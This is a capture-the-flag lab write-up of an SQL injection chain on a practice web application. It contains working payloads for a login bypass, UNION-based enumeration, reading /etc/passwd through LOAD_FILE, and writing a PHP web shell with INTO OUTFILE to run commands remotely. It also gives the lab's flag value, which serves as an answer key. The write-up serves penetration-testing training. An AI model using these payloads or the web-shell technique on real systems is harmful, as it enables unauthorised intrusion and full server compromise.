# SQL Injection in Authentication and Search Parameters resulting in Remote Code Execution

## Description

The company `InlaneFreight` has contracted you to perform a web application assessment against one of their public-facing websites. In light of a recent breach of one of their main competitors, they are particularly concerned with SQL injection vulnerabilities and the damage the discovery and successful exploitation of this attack could do to their public image and bottom line.

## Objective

* SQL Injection

## Flag

* `528d6d9cedc2c7aab146ef226e918396`

## Solution

While poking around the target web application hosted at `http://94.237.57.106:46185`, the login page stood out as the first thing worth testing.

The application proved vulnerable to SQL injection. After some digging, two exploitable injection points were found:

* Authentication bypass
* Search feature

Together they gave full access to the backend database and eventually led to **Remote Code Execution (RCE)**.

<figure><img src="/files/xPrg9JJI8bxWRMgjTQay" alt=""><figcaption></figcaption></figure>

#### Authentication Bypass via Blind SQL Injection

Testing of the login page started with the following payload in the **username** field, with an arbitrary value in the password field:

```sql
admin' or '1'='1'-- -
```

<figure><img src="/files/rdgmLZ9J97bIqqOpbknu" alt=""><figcaption></figcaption></figure>

The payload bypassed authentication and landed on the dashboard. Because the login form returns only success or failure and never displays query output, the injection is blind at this point: its existence is confirmed by the application's behaviour, not by any returned data.
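The following is an added illustration of why that payload works; it is not from the original writeup. The application's real login query is not shown on the page, so the query shape, table and column names below are assumed, chosen as the simplest form the payload works against.

```sql
-- Added illustration (not from the writeup): an assumed login query of the
-- simplest shape the payload works against. Table and column names are
-- hypothetical; the application's real query is not known.
-- Query as built by string concatenation of the two form fields:
SELECT id, username
  FROM users
 WHERE username = '<username>' AND password = '<password>';

-- With username = admin' or '1'='1'-- -  (and any password), MySQL receives:
SELECT id, username
  FROM users
 WHERE username = 'admin' or '1'='1'-- -' AND password = 'whatever';

-- Everything after "-- " is a comment, so the password check is gone and the
-- condition is (username = 'admin') OR TRUE: every row matches and the
-- application logs in as whichever row it reads first.
-- MySQL only treats "--" as a comment when it is followed by whitespace; the
-- trailing "-" keeps that space from being trimmed off by the application.

-- Variant that matches only the admin row, for when the first row returned is
-- not the account wanted. Payload: admin'-- -   (no OR clause, same comment):
SELECT id, username
  FROM users
 WHERE username = 'admin'-- -' AND password = 'whatever';
```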

#### SQL Injection in the Search Parameter

Next, attention turned to the dashboard's search functionality. Submitting a single quote (`'`) in the **search** field triggered an SQL error message, confirming a second injection point and showing that database errors are reported back to the page.

<figure><img src="/files/Jvb9uq5jfBTJ7hWyiEIL" alt=""><figcaption></figcaption></figure>

To test for data extraction, the following payload was used:

```sql
' UNION SELECT 1, user(), 3, 4, 5-- -
```

<figure><img src="/files/tVOpGPUzNxf3jGKdfclR" alt=""><figcaption></figcaption></figure>

This payload returned the database user, `root@localhost`. The application connects as the MySQL root account, which by default holds every global privilege, including `SUPER` and `FILE`; the `FILE` privilege is what makes the file operations below possible.
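The enumeration steps behind the UNION payload are shown below as an added example; they are not from the original writeup. They assume the same search-parameter injection point, the same five-column result set, and that the second column is the one reflected in the page, as the payload above relies on. Each line is a separate value submitted in the search field.

```sql
-- Added example (not from the writeup): the enumeration that leads to the
-- five-column UNION above, plus a privilege check. Same injection point
-- assumed; each payload line is a separate value for the search parameter.

-- 1. Column count: ORDER BY n errors once n exceeds the number of columns
--    in the original SELECT. Here 5 succeeds and 6 errors, so five columns.
' ORDER BY 5-- -
' ORDER BY 6-- -

-- 2. Which column is reflected: the marker that shows up in the page
--    (here "2") is the column that can carry data out.
' UNION SELECT 1, 2, 3, 4, 5-- -

-- 3. Fingerprint server and account. USER() is the connecting account,
--    CURRENT_USER() the one privileges are checked against; they can differ.
' UNION SELECT 1, @@version, 3, 4, 5-- -
' UNION SELECT 1, CURRENT_USER(), 3, 4, 5-- -

-- 4. Do not infer FILE from the name "root": list the global privileges
--    actually granted. GROUP_CONCAT collapses them into the single reflected
--    row; the grantee value in information_schema includes its own quotes.
' UNION SELECT 1, GROUP_CONCAT(privilege_type SEPARATOR ', '), 3, 4, 5 FROM information_schema.user_privileges WHERE grantee = "'root'@'localhost'"-- -
```

If step 4 does not list `FILE`, `LOAD_FILE` returns NULL and `INTO OUTFILE` fails with an access-denied error regardless of what `secure_file_priv` is set to.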

#### Reading Files with LOAD_FILE

Leveraging the `FILE` privilege, reading `/etc/passwd` was attempted with:

```sql
' UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3, 4, 5-- -
```

<figure><img src="/files/R1R1DzPDAoSju6tGZoc5" alt=""><figcaption></figcaption></figure>

The contents of the file were displayed in the search results. A further check confirmed that `secure_file_priv` was empty, meaning the server places no directory restriction on `LOAD_FILE` and `INTO OUTFILE`, so arbitrary file reads and writes (with the permissions of the MySQL OS user) were possible.

#### Writing a Web Shell and Achieving RCE

With the ability to write files, a PHP web shell was written into the web root using `INTO OUTFILE`:

```sql
' UNION SELECT "", "<?php system($_REQUEST[cmd]); ?>", "", "", "" INTO OUTFILE '/var/www/html/dashboard/shell.php'-- -
```

The shell was then invoked via:

```http
http://94.237.57.106:46185/dashboard/shell.php?cmd=id
```

<figure><img src="/files/OdG2X66R29exLqQxKCUn" alt=""><figcaption></figcaption></figure>

The response contained the output of the `id` command, confirming remote code execution as the web server's user.

#### Navigating the Server

From there, further commands were issued through the same `cmd` parameter, for example:

```http
http://94.237.57.106:46185/dashboard/shell.php?cmd=ls+/
```

<figure><img src="/files/AkqaO1bKm9YQtt1PGaQx" alt=""><figcaption></figcaption></figure>

This allowed enumeration of the file system and deeper exploration of the compromised server, revealing the file `flag_cae1dadcd174.txt` with the flag value `528d6d9cedc2c7aab146ef226e918396`.

## Conclusion

This challenge demonstrated an SQL injection attack chain:

* **Blind SQL injection** for login bypass
* **Union-based SQL injection** for data exfiltration and file reads via `LOAD_FILE`
* **Remote Code Execution** via a web shell written with `INTO OUTFILE`

Through careful enumeration and exploitation, the target was escalated from SQL injection to full system compromise.

